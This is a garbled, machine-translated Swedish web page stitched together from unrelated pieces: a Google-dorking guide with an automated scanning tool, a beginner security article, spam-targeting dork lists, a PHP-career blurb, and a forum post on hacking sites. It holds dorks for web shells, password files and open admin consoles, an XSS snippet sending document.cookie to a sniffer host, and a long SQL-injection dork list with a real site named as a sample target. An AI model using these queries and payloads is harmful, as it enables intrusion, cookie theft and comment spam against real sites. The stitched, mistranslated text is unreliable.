Vi använder föga kända Google-funktioner för att hitta dolda saker. Hur tjänar man pengar genom att kunna PHP? Produkter inurl posting preview php id

Varje sökning efter sårbarheter på webbresurser börjar med spaning och informationsinsamling.
Intelligens kan antingen vara aktiv - brute force av filer och kataloger på webbplatsen, köra sårbarhetsskannrar, manuellt surfa på webbplatsen eller passiv - sökning efter information i olika sökmotorer. Ibland händer det att en sårbarhet blir känd redan innan den första sidan på sajten öppnas.

Hur är detta möjligt?
Sökrobotar, ständigt roaming på Internet, förutom information som är användbar för den genomsnittliga användaren, registrerar ofta saker som kan användas av angripare för att attackera en webbresurs. Till exempel skriptfel och filer med känslig information (från konfigurationsfiler och loggar till filer med autentiseringsdata och säkerhetskopior av databas).
Ur en sökrobots synvinkel är ett felmeddelande om att köra en sql-fråga ren text, oskiljbar, till exempel från beskrivningen av produkterna på sidan. Om en sökrobot plötsligt stöter på en fil med filtillägget .sql, som av någon anledning hamnat i webbplatsens arbetsmapp, kommer den att uppfattas som en del av webbplatsens innehåll och kommer även att indexeras (inklusive, eventuellt, lösenorden specificeras i den).

Sådan information kan hittas genom att känna till starka, ofta unika, nyckelord som hjälper till att skilja "sårbara sidor" från sidor som inte innehåller sårbarheter.
En enorm databas med speciella frågor som använder nyckelord (så kallade dorks) finns på exploit-db.com och är känd som Google Hack Database.

Varför google?
Dorks är främst inriktade på Google av två anledningar:
− den mest flexibla syntaxen för nyckelord (visas i tabell 1) och specialtecken (visas i tabell 2);
− Googles index är fortfarande mer komplett än det för andra sökmotorer;

Tabell 1 - Googles viktigaste sökord

Nyckelord
Menande
Exempel
webbplats
Sök endast på den angivna webbplatsen. Tar bara hänsyn till url
site:somesite.ru - hittar alla sidor på en given domän och underdomäner
inurl
Sök efter ord som finns i uri. Till skillnad från cl. ord "webbplats", söker efter matchningar efter webbplatsens namn
inurl:news - hittar alla sidor där det givna ordet förekommer i uri
i skrift
Sök i brödtexten på sidan
intext:"trafikstockningar" - helt lik den vanliga begäran om "trafikstockningar"
intitle
Sök i sidrubriken. Text mellan taggar
intitle:”index of” - hittar alla sidor med kataloglistor
ext
Sök efter sidor med en angiven tillägg
ext:pdf - hittar alla pdf-filer
filtyp
För närvarande helt lik klass. ordet "ext"
filetype:pdf - liknande
relaterad
Sök efter webbplatser med liknande ämnen
relaterad:google.ru - visar dess analoger
länk
Sök efter webbplatser som länkar till detta
link:somesite.ru - hittar alla webbplatser som har en länk till detta
definiera
Visa orddefinition
define:0day - definition av termen
cache
Visa sidinnehåll i cache (om det finns)
cache:google.com - öppnar en cachad sida

Tabell 2 - Specialtecken för Google-frågor

Symbol
Menande
Exempel

Exakt fras
intitle:“RouterOS-routerkonfigurationssida” - sök efter routrar
*
Vilken text som helst
inurl: "bitrix*mcart" - sök efter webbplatser på bitrix med en sårbar mcart-modul
.
Vilken karaktär som helst
Index.of - liknande indexet för begäran
-
Ta bort ett ord
error -warning - visa alla sidor som har ett fel men ingen varning
..
Räckvidd
cve 2006..2016 - visa sårbarheter efter år från och med 2006
|
Logiskt "eller"
linux | fönster - visar sidor där antingen det första eller andra ordet förekommer

Det är värt att förstå att varje begäran till en sökmotor är en sökning endast med ord.
Det är värdelöst att leta efter meta-tecken på sidan (citattecken, parenteser, skiljetecken, etc.). Även en sökning på den exakta frasen som anges inom citattecken är en ordsökning, följt av en sökning efter en exakt matchning i resultaten.

Alla Google Hack Database-dockar är logiskt indelade i 14 kategorier och presenteras i Tabell 3.
Tabell 3 – Googles hackdatabaskategorier

Kategori
Vad gör att du kan hitta
Exempel
Fotfästen
Webbskal, offentliga filhanterare
Hitta alla hackade webbplatser där de listade webbskalen laddas upp:
(intitle:"phpshell" ELLER intitle:"c99shell" ELLER intitle:"r57shell" ELLER intitle:"PHP Shell" ELLER intitle:"phpRemoteView") `rwx` "uname"
Filer som innehåller användarnamn
Registerfiler, konfigurationsfiler, loggar, filer som innehåller historiken för inmatade kommandon
Hitta alla registerfiler som innehåller kontoinformation:
filtyp:reg reg +intext:"Internet Account Manager"
Känsliga kataloger
Kataloger med olika information (personliga dokument, vpn-konfigurationer, dolda arkiv, etc.)
Hitta alla kataloglistor som innehåller VPN-relaterade filer:
"Config" intitle:"Index för" intext:vpn
Webbplatser som innehåller git-repositories:
(intext:"index av /.git") ("överordnad katalog")
Webbserverdetektering
Version och annan information om webbservern
Hitta administrativa konsoler för JBoss-server:
inurl:"/web-console/" intitle:"Administrationskonsol"
Sårbara filer
Skript som innehåller kända sårbarheter
Hitta webbplatser som använder ett skript som låter dig ladda upp en godtycklig fil från servern:
allinurl:forcedownload.php?file=
Sårbara servrar
Installationsskript, webbskal, öppna administrativa konsoler, etc.
Hitta öppna PHPMyAdmin-konsoler som körs som root:
intitle:phpMyAdmin "Välkommen till phpMyAdmin ***" "kör på * som root@*"
Felmeddelanden
Olika fel och varningar avslöjar ofta viktig information - från CMS-version till lösenord
Webbplatser som har fel vid exekvering av SQL-frågor till databasen:
"Varning: mysql_query()" "ogiltig fråga"
Filer som innehåller saftig information
Certifikat, säkerhetskopior, e-postmeddelanden, loggar, SQL-skript, etc.
Hitta initialiserings-sql-skript:
filtyp:sql och "insert into" -site:github.com
Filer som innehåller lösenord
Allt som kan innehålla lösenord - loggar, sql-skript, etc.
Loggar som nämner lösenord:
filtyp:loggai skrift:lösenord |passera |pw
sql-skript som innehåller lösenord:
ext:sqli skrift:Användarnamni skrift:Lösenord
Känslig online shoppinginformation
Information relaterad till onlineköp
Hitta pinkoder:
dcid=bn=stiftkod=
Nätverks- eller sårbarhetsdata
Information som inte är direkt relaterad till webbresursen, men som påverkar nätverket eller andra icke-webbtjänster
Hitta skript för automatisk proxykonfiguration som innehåller information om det interna nätverket:
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
Sidor som innehåller inloggningsportaler
Sidor som innehåller inloggningsformulär
saplogon webbsidor:
intext:"2016 SAP AG. Alla rättigheter förbehållna." intitle:"Logga in"
Olika onlineenheter
Skrivare, routrar, övervakningssystem m.m.
Hitta skrivarens konfigurationspanel:
intitle:"hplaserjet"inurl:SSI/Auth/uppsättning_config_enhetsinformation.htm
Rådgivning och sårbarheter
Webbplatser på sårbara CMS-versioner
Hitta sårbara plugins genom vilka du kan ladda upp en godtycklig fil till servern:
inurl:fckeditor -intext:"ConfigIsEnabled = False" intext:ConfigIsEnabled

Dorks är oftare fokuserade på att söka på alla webbplatser. Men ingenting hindrar dig från att begränsa sökomfånget på någon webbplats eller webbplatser.
Varje Google-fråga kan fokuseras på en specifik webbplats genom att lägga till sökordet "site:somesite.com" i frågan. Det här nyckelordet kan läggas till i vilken tönt som helst.

Automatisera sökningen efter sårbarheter
Så här föddes idén att skriva ett enkelt verktyg som automatiserar sökningen efter sårbarheter med hjälp av en sökmotor (google) och förlitar sig på Googles hackdatabas.

Verktyget är ett skript skrivet i nodejs med phantomjs. För att vara exakt tolkas manuset av phantomjs själv.
Phantomjs är en fullfjädrad webbläsare utan ett GUI, styrd av js-kod och med ett bekvämt API.
Verktyget fick ett ganska förståeligt namn - dorks. Genom att köra den på kommandoraden (utan alternativ) får vi kort hjälp med flera exempel på användning:


Figur 1 - Lista över de viktigaste durkalternativen

Den allmänna syntaxen för verktyget är: dork "kommando" "alternativlista".
En detaljerad beskrivning av alla alternativ presenteras i tabell 4.

Tabell 4 - Dorks syntax

Team
Alternativ
Beskrivning
ghdb
-l
Skriv ut en numrerad lista över skitkategorier Google Hack Database
-c "kategorinummer eller namn"
Ladda dörrar av angiven kategori efter nummer eller namn
-q "fras"
Ladda ner dorks hittade på begäran
-o "fil"
Spara resultatet till en fil (endast med -c|-q-alternativ)
Google
-d "dörk"
Ställ in en godtycklig dork (alternativet kan användas många gånger, kombination med -D-alternativet är tillåtet)
-D "fil"
Använd dorks from file
-s "webbplats"
Ange plats (alternativet kan användas många gånger, kombination med alternativet -S är tillåtet)
-S "fil"
Använd webbplatser från en fil (dorks kommer att sökas för varje webbplats oberoende)
-f "filter"
Ställ in ytterligare sökord (kommer att läggas till i varje dork)
-t "antal ms"
Intervall mellan förfrågningar till google
-T "antal ms"
Timeout om en captcha påträffas
-o "fil"
Spara resultatet till en fil (endast de spår som något hittades för kommer att sparas)

Genom att använda ghdb-kommandot kan du hämta alla tönter från exploit-db genom godtycklig begäran, eller specificera hela kategorin. Om du anger kategori 0 kommer hela databasen att laddas ur (cirka 4,5 tusen töntar).

Listan över kategorier som för närvarande är tillgängliga visas i figur 2.

Figur 2 - Lista över tillgängliga GHDB-doppkategorier

Google-teamet kommer att ersätta varje tönt i Googles sökmotor och analysera resultatet för matchningar. Sökvägarna där något hittades kommer att sparas i en fil.
Verktyget stöder olika söklägen:
1 dork och 1 plats;
1 tönt och många platser;
1 plats och många töntar;
många platser och många töntar;
Listan över tjurar och webbplatser kan specificeras antingen genom ett argument eller genom en fil.

Demonstration av arbete
Låt oss försöka leta efter eventuella sårbarheter med exemplet att söka efter felmeddelanden. Genom kommando: dorks ghdb –c 7 –o errors.dorks kommer alla kända dorks i kategorin "Felmeddelanden" att laddas som visas i figur 3.


Figur 3 – Laddar alla kända tjurar i kategorin "Felmeddelanden".

Dorks laddas ner och sparas till en fil. Nu återstår bara att "ställa in" dem på någon plats (se figur 4).


Figur 4 – Sök efter sårbarheter för webbplatsen av intresse i Googles cache

Efter en tid upptäcks flera sidor som innehåller fel på platsen som studeras (se figur 5).


Figur 5 – Felmeddelanden hittades

Som ett resultat får vi i filen result.txt en komplett lista över tjurar som leder till felet.
Figur 6 visar resultatet av att söka efter webbplatsfel.

Figur 6 – Felsökningsresultat

I cachen för denna dork visas en fullständig bakåtspårning, som avslöjar de absoluta sökvägarna för skripten, webbplatsens innehållshanteringssystem och databastypen (se figur 7).


Figur 7 – utlämnande av information om webbplatsens design

Det är dock värt att tänka på att inte alla töntar från GHDB ger verkliga resultat. Dessutom kanske Google inte hittar en exakt matchning och visar ett liknande resultat.

I det här fallet är det klokare att använda din personliga lista över töntar. Till exempel är det alltid värt att leta efter filer med "ovanliga" tillägg, exempel på vilka visas i figur 8.


Figur 8 – Lista över filtillägg som inte är typiska för en vanlig webbresurs

Som ett resultat, med kommandot dorks google –D extensions.txt –f bank, börjar Google från den allra första begäran returnera webbplatser med "ovanliga" filtillägg (se figur 9).


Figur 9 – Sök efter "dåliga" filtyper på bankwebbplatser

Det är värt att komma ihåg att Google inte accepterar frågor som är längre än 32 ord.

Använda kommandot dorks google –d intext:”error|warning|notice|syntax” –f university
Du kan leta efter PHP-tolkfel på utbildningswebbplatser (se figur 10).


Figur 10 – Hitta PHP-runtime-fel

Ibland är det inte bekvämt att använda en eller två kategorier av töntar.
Om det till exempel är känt att webbplatsen körs på Wordpress-motorn behöver vi WordPress-specifika moduler. I det här fallet är det bekvämt att använda Google Hack Database-sökning. Kommandot dorks ghdb –q wordpress –o wordpress_dorks.txt kommer att ladda ner alla dorks från Wordpress, som visas i figur 11:


Figur 11 – Sök efter Dorks relaterade till Wordpress

Låt oss gå tillbaka till bankerna igen och använda kommandot dorks google –D wordpress_dords.txt –f bank för att försöka hitta något intressant relaterat till Wordpress (se figur 12).


Figur 12 – Sök efter sårbarheter i Wordpress

Det är värt att notera att sökningen på Google Hack Database inte accepterar ord kortare än 4 tecken. Till exempel, om webbplatsens CMS inte är känt, men språket är känt - PHP. I det här fallet kan du filtrera det du behöver manuellt med hjälp av pipen och systemsökningsverktyget dorks –c all | findstr /I php > php_dorks.txt (se figur 13):


Figur 13 – Sök igenom alla dorks där PHP nämns

Att söka efter sårbarheter eller någon känslig information i en sökmotor bör endast göras om det finns ett betydande index på denna webbplats. Till exempel, om en webbplats har 10-15 indexerade sidor, är det dumt att söka efter vad som helst på det här sättet. Det är enkelt att kontrollera indexstorleken - skriv bara in "site:somesite.com" i Googles sökfält. Ett exempel på en webbplats med ett otillräckligt index visas i figur 14.


Figur 14 – Kontrollera storleken på webbplatsindex

Nu om det obehagliga... Då och då kan Google begära en captcha - det finns inget du kan göra åt det - du måste ange det. Till exempel, när du söker igenom kategorin "Felmeddelanden" (90 töntar), dök captcha bara en gång.

Det är värt att tillägga att phantomjs också stöder att arbeta via en proxy, både via http och socks-gränssnitt. För att aktivera proxyläge måste du avkommentera motsvarande rad i dorks.bat eller dorks.sh.

Verktyget är tillgängligt som källkod

Jag bestämde mig för att prata lite om informationssäkerhet. Artikeln kommer att vara användbar för nybörjare och de som precis har börjat engagera sig i Frontend-utveckling. Vad är problemet?

Många nybörjare utvecklas så med att skriva kod att de helt glömmer bort säkerheten i sitt arbete. Och viktigast av allt, de glömmer sådana sårbarheter som SQL och XXS-frågor. De kommer också med enkla lösenord för sina administrativa paneler och utsätts för brute force. Vilka är dessa attacker och hur kan du undvika dem?

SQL-injektion

SQL-injektion är den vanligaste typen av attack mot en databas, som utförs under en SQL-fråga för ett specifikt DBMS. Många människor och även stora företag drabbas av sådana attacker. Anledningen är ett utvecklarfel vid skrivning av databasen och strängt taget SQL-frågor.

En SQL-injektionsattack är möjlig på grund av felaktig bearbetning av indata som används i SQL-frågor. Om en hackers attack lyckas riskerar du att förlora inte bara innehållet i databaserna, utan även lösenord och administrativa panelloggar. Och denna data kommer att vara tillräckligt för att helt ta över webbplatsen eller göra oåterkalleliga justeringar av den.

Attacken kan framgångsrikt reproduceras i skript skrivna i PHP, ASP, Perl och andra språk. Framgången för sådana attacker beror mer på vilket DBMS som används och hur själva skriptet implementeras. Det finns många sårbara platser för SQL-injektioner i världen. Detta är lätt att verifiera. Ange bara "dorks" - det här är speciella frågor för att söka efter sårbara webbplatser. Här är några av dem:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

Hur använder man dem? Ange dem bara i en Google- eller Yandex-sökmotor. Sökmotorn ger dig inte bara en sårbar webbplats, utan också en sida om denna sårbarhet. Men vi kommer inte att stanna där och se till att sidan verkligen är sårbar. För att göra detta räcker det att sätta ett enda citattecken "' efter värdet "id=1". Något som det här:

  • inurl:games.php?id=1'

Och webbplatsen kommer att ge oss ett felmeddelande om SQL-frågan. Vad behöver vår hacker härnäst?

Och då behöver han just den här länken till felsidan. Sedan sker arbetet med sårbarheten i de flesta fall i "Kali linux"-distributionen med dess verktyg för denna del: införa injektionskod och utföra nödvändiga operationer. Hur detta kommer att hända kan jag inte berätta för dig. Men du kan hitta information om detta på Internet.

XSS Attack

Denna typ av attack utförs på cookies-filer. Användare i sin tur älskar att spara dem. Varför inte? Vad skulle vi göra utan dem? När allt kommer omkring, tack vare cookies, behöver vi inte ange lösenordet för Vk.com eller Mail.ru hundra gånger. Och det är få som vägrar dem. Men på Internet dyker det ofta upp en regel för hackare: bekvämlighetskoefficienten är direkt proportionell mot osäkerhetskoefficienten.

För att implementera en XSS-attack behöver vår hacker kunskap om JavaScript. Vid första anblicken är språket väldigt enkelt och ofarligt, eftersom det inte har tillgång till datorresurser. En hacker kan bara arbeta med JavaScript i en webbläsare, men det räcker. När allt kommer omkring är det viktigaste att ange koden på webbsidan.

Jag kommer inte att prata i detalj om attackprocessen. Jag kommer bara att berätta för dig grunderna och innebörden av hur detta händer.

En hackare kan lägga till JS-kod till något forum eller gästbok:

document.location.href =”http://192.168.1.7/sniff.php?test”

Skripten kommer att omdirigera oss till den infekterade sidan, där koden kommer att exekveras: vare sig det är en sniffer, någon form av lagring eller en exploatering, som på något sätt kommer att stjäla våra cookies från cachen.

Varför JavaScript? Eftersom JavaScript är bra på att hantera webbförfrågningar och har tillgång till cookies. Men om vårt skript tar oss till någon sida kommer användaren lätt att märka det. Här använder hackaren ett mer listigt alternativ – han anger helt enkelt koden i bilden.

Img=ny bild();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Vi skapar helt enkelt en bild och tilldelar vårt skript till den som en adress.

Hur skyddar man sig från allt detta? Det är väldigt enkelt - klicka inte på misstänkta länkar.

DoS- och DDos-attacker

DoS (från engelska Denial of Service - denial of service) är en hackerattack mot ett datorsystem med målet att få det att misslyckas. Detta är skapandet av förhållanden under vilka systemanvändare i god tro inte kan komma åt de tillhandahållna systemresurserna (servrarna), eller så är åtkomsten svår. Ett systemfel kan också vara ett steg mot dess övertagande om programvaran i en nödsituation producerar någon kritisk information: till exempel en version, en del av en programkod, etc. Men oftast är detta ett mått på ekonomisk press: förlusten av en enkel tjänst som genererar inkomst. Räkningar från leverantören eller åtgärder för att undvika en attack träffar "målet" i fickan avsevärt. För närvarande är DoS- och DDoS-attacker de mest populära, eftersom de tillåter nästan alla system att misslyckas utan att lämna juridiskt betydande bevis.

Vad är skillnaden mellan DoS och DDos attack?

DoS är en attack designad på ett smart sätt. Till exempel, om servern inte kontrollerar korrektheten av inkommande paket, kan en hackare göra en begäran som kommer att ta evigheter att behandla, och det kommer inte att finnas tillräckligt med processortid för att arbeta med andra anslutningar. Följaktligen kommer kunder att nekas service. Men det kommer inte att vara möjligt att överbelasta eller inaktivera stora välkända sajter på detta sätt. De är beväpnade med ganska breda kanaler och superkraftiga servrar som kan klara av sådan överbelastning utan problem.

DDoS är faktiskt samma attack som DoS. Men om det finns ett förfrågningspaket i DoS kan det finnas hundratals eller fler av dem i DDoS. Även superkraftiga servrar kanske inte kan hantera en sådan överbelastning. Låt mig ge dig ett exempel.

En DoS-attack är när du har ett samtal med någon, men då kommer någon ouppfostrad person fram och börjar skrika högt. Det är antingen omöjligt eller väldigt svårt att prata. Lösning: ring säkerhetstjänsten, som lugnar ner sig och tar bort personen från lokalen. DDoS-attacker är när en skara på tusentals sådana ouppfostrade människor rusar in. I det här fallet kommer säkerheten inte att kunna binda alla och ta bort dem.

DoS och DDoS utförs från datorer, de så kallade zombies. Det här är datorer med användare som hackats av hackare som inte ens misstänker att deras maskin deltar i en attack mot någon server.

Hur skyddar man sig från detta? I allmänhet, inget sätt. Men du kan göra det svårare för en hackare. För att göra detta måste du välja ett bra webbhotell med kraftfulla servrar.

Bruteforce attack

En utvecklare kan komma med många attackskyddssystem, granska skripten vi har skrivit fullständigt, kontrollera webbplatsen för sårbarheter osv. Men när han kommer till det sista steget i webblayouten, nämligen när han helt enkelt ställer in ett lösenord för adminpanelen, kan han glömma en sak. Lösenord!

Det rekommenderas absolut inte att ställa in ett enkelt lösenord. Detta kan vara 12345, 1114457, vasya111, etc. Det rekommenderas inte att ställa in lösenord som är kortare än 10-11 tecken långa. Annars kan du bli utsatt för den vanligaste och mest okomplicerade attacken - Brute force.

Brute force är en ordbok lösenordssökning attack med hjälp av speciella program. Ordböcker kan vara olika: latin, uppräkning med siffror, säg upp till ett visst intervall, blandat (latin + siffror), och det finns till och med ordböcker med unika tecken @#4$%&*~~`’”\ ? etc.

Naturligtvis är den här typen av attack lätt att undvika. Allt du behöver göra är att komma med ett komplext lösenord. Även en captcha kan rädda dig. Dessutom, om din webbplats är gjord på ett CMS, så upptäcker många av dem denna typ av attack och blockerar IP:n. Du måste alltid komma ihåg att ju fler olika tecken i ett lösenord, desto svårare är det att gissa.

Hur fungerar hackare? I de flesta fall misstänker eller känner de till en del av lösenordet i förväg. Det är ganska logiskt att anta att användarens lösenord definitivt inte kommer att bestå av 3 eller 5 tecken. Sådana lösenord leder till frekvent hackning. I grund och botten tar hackare ett intervall på 5 till 10 tecken och lägger till flera tecken som de kanske känner till i förväg. Därefter genereras lösenord med de nödvändiga intervallen. Kali Linux-distributionen har till och med program för sådana fall. Och voila, attacken kommer inte längre att pågå länge, eftersom volymen på ordboken inte längre är så stor. Dessutom kan en hackare använda kraften från grafikkortet. Vissa av dem stöder CUDA-systemet, och sökhastigheten ökar med så mycket som 10 gånger. Och nu ser vi att en attack på ett så enkelt sätt är ganska verklig. Men det är inte bara webbplatser som utsätts för brute force.

Kära utvecklare, glöm aldrig informationssäkerhetssystemet, för idag lider många människor, inklusive stater, av sådana typer av attacker. Den största sårbarheten är trots allt en person som alltid kan bli distraherad någonstans eller missa något. Vi är programmerare, men inte programmerade maskiner. Var alltid på din vakt, för att förlora information kan få allvarliga konsekvenser!

Hur man söker korrekt med google.com

Alla vet förmodligen hur man använder en sökmotor som Google =) Men det är inte alla som vet att om du korrekt komponerar en sökfråga med hjälp av speciella konstruktioner kan du uppnå resultatet av det du letar efter mycket mer effektivt och snabbare =) I den här artikeln Jag ska försöka visa det och vad du behöver göra för att söka rätt

Google stöder flera avancerade sökoperatorer som har speciell betydelse vid sökning på google.com. Vanligtvis ändrar dessa uttalanden sökningen, eller till och med säger åt Google att göra helt andra typer av sökningar. Till exempel är länken: construct en speciell operatör och begäran länk: www.google.com kommer inte att ge dig en normal sökning, utan hittar istället alla webbsidor som har länkar till google.com.
alternativa förfrågningstyper

cache: Om du inkluderar andra ord i en fråga kommer Google att markera de inkluderade orden i det cachade dokumentet.
Till exempel, cache: www.webbplats kommer att visa det cachade innehållet med ordet "webb" markerat.

länk: Sökfrågan ovan visar webbsidor som innehåller länkar till den angivna frågan.
Till exempel: länk: www.webbplats kommer att visa alla sidor som har en länk till http://www.site

relaterat: Visar webbsidor som är "relaterade" till den angivna webbsidan.
Till exempel, relaterat: www.google.com kommer att lista webbsidor som liknar Googles startsida.

info: Begär information: presenterar viss information som Google har om webbsidan du begär.
Till exempel, info:webbplats kommer att visa information om vårt forum =) (Armada - Adult Webmasters Forum).

Övriga förfrågningar om information

define: Define:-frågan ger en definition av orden du anger efter den, samlad från olika onlinekällor. Definitionen kommer att gälla för hela den angivna frasen (det vill säga den kommer att inkludera alla ord i den exakta frågan).

aktier: Om du startar en fråga med aktier: Google kommer att behandla resten av söktermerna som aktiesymboler och länka till en sida som visar färdig information om dessa symboler.
Till exempel, aktier: Intel Yahoo kommer att visa information om Intel och Yahoo. (Observera att du ska skriva de senaste nyheternas symboler, inte företagets namn)

Frågemodifierare

site: Om du inkluderar site: i din fråga kommer Google att begränsa resultaten till de webbplatser som hittas på den domänen.
Du kan också söka efter enskilda zoner, som ru, org, com, etc ( site:com site:ru)

allintitle: Om du kör en fråga med allintitle:, kommer Google att begränsa resultaten till alla frågeord i titeln.
Till exempel, allintitle: google-sökning kommer att returnera alla Google-sidor genom sökning som bilder, blogg, etc

intitle: Om du inkluderar intitle: i din fråga kommer Google att begränsa resultaten till dokument som innehåller det ordet i titeln.
Till exempel, intitle:Business

allinurl: Om du kör en fråga med allinurl: Google kommer att begränsa resultaten till alla sökord i webbadressen.
Till exempel, allinurl: google-sökning kommer att returnera dokument med google och söka i rubriken. Som ett alternativ kan du också separera ord med ett snedstreck (/) så kommer ord på båda sidor av snedstrecket att sökas på samma sida: Exempel allinurl: foo/bar

inurl: Om du inkluderar inurl: i din fråga kommer Google att begränsa resultaten till dokument som innehåller det ordet i webbadressen.
Till exempel, Animation inurl:site

intext: söker endast efter det angivna ordet i sidtexten, ignorerar titel- och länktexter och annat som inte är relaterat till. Det finns också en derivata av denna modifierare - allintext: d.v.s. vidare kommer alla ord i frågan endast att sökas i texten, vilket också kan vara viktigt, och ignorerar ofta använda ord i länkar
Till exempel, intext:forum

daterange: söker inom en tidsram (daterange:2452389-2452389), datum för tider är i julianskt format.

Tja, och alla möjliga intressanta exempel på frågor

Exempel på att skriva frågor för Google. För spammare

Inurl:control.guest?a=sign

Site:books.dreambook.com “Hemsida URL” “Sign my” inurl:sign

Webbplats: www.freegb.net Hemsida

Inurl:sign.asp "Antal tecken"

"Meddelande:" inurl:sign.cfm "Avsändare:"

Inurl:register.php “Användarregistrering” “Webbplats”

Inurl:edu/guestbook "Sign the Guestbook"

Inurl:post "Lägg in kommentar" "URL"

Inurl:/archives/ “Kommentarer:” “Kommer du ihåg info?”

"Manus och gästbok Skapad av:" "URL:" "Kommentarer:"

Inurl:?action=lägg till "phpBook" "URL"

Intitle:"Skicka in ny berättelse"

Tidningar

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Gästbok"

Bloggar

Inurl:blogger.com/comment.g?”postID””anonymous”

Inurl:typepad.com/ "Skriv en kommentar" "Kommer du ihåg personlig information?"

Inurl:greatestjournal.com/community/ "Lägg in kommentar" "adresser till anonyma affischer"

"Skriv kommentar" "adresser till anonyma affischer" -

Intitle:"Skriv kommentar"

Inurl:pirillo.com “Skriv kommentar”

Forum

Inurl:gate.html?”name=Forum” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”members.html”

Inurl:forum/memberlist.php?”

Med tillkomsten av datorer och internet har många ytterligare yrken dykt upp.


Programmeringsspecialister efterfrågas nu, eftersom många olika projekt lanseras via Internet. Därför bör alla sökande överväga att välja en specialitet relaterad till datorer.

Hur tjänar man pengar genom att kunna PHP? I den här artikeln kommer vi att titta på ett av programmeringsområdena. Skriptspråk används aktivt för applikationsutveckling.

Tekniken har varit aktuell i många år och om du lär dig PHP kan du tjäna bra pengar. Det viktigaste är att efterfrågan på specialister inom detta område är enorm.

Hur mycket tjänar en PHP-programmerare?

Det är omöjligt att nämna den exakta summan, eftersom alla jobbar i olika företag, och vissa jobbar till och med hemifrån. Aktiva arbetare får i alla fall en bra lön.

De som jobbar utan att lämna hemmet får exakt lika mycket som de lyckas genomföra beställningar. Priser i en nisch sätts sällan, oftast förhandlas de individuellt.

Bland fördelarna med att arbeta som PHP-programmerare är det värt att notera aktivitetens seriösa utsikter och relevans. I en tid då Internet penetrerar nästan alla områden är det verkligen lönsamt att arbeta som programmerare.

Och så, nu ska jag berätta hur man hackar något utan någon speciell kunskap. Jag ska genast säga att det är liten nytta av detta, men ändå.
Först måste du hitta webbplatserna själva. För att göra detta, gå till google.com och sök efter dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

här är en liten lista. Du kan använda din. Och så hittade vi webbplatsen. Till exempel http://www.vestitambov.ru/
Ladda sedan ner det här programmet

**Doldt innehåll: För att se detta dolda innehåll måste ditt antal inlägg vara 3 eller fler.**

Klicka på OK. Sedan lägger vi in ​​offersidan.
Vi trycker på start. Därefter väntar vi på resultatet.
Och så hittade programmet en SQL-sårbarhet.

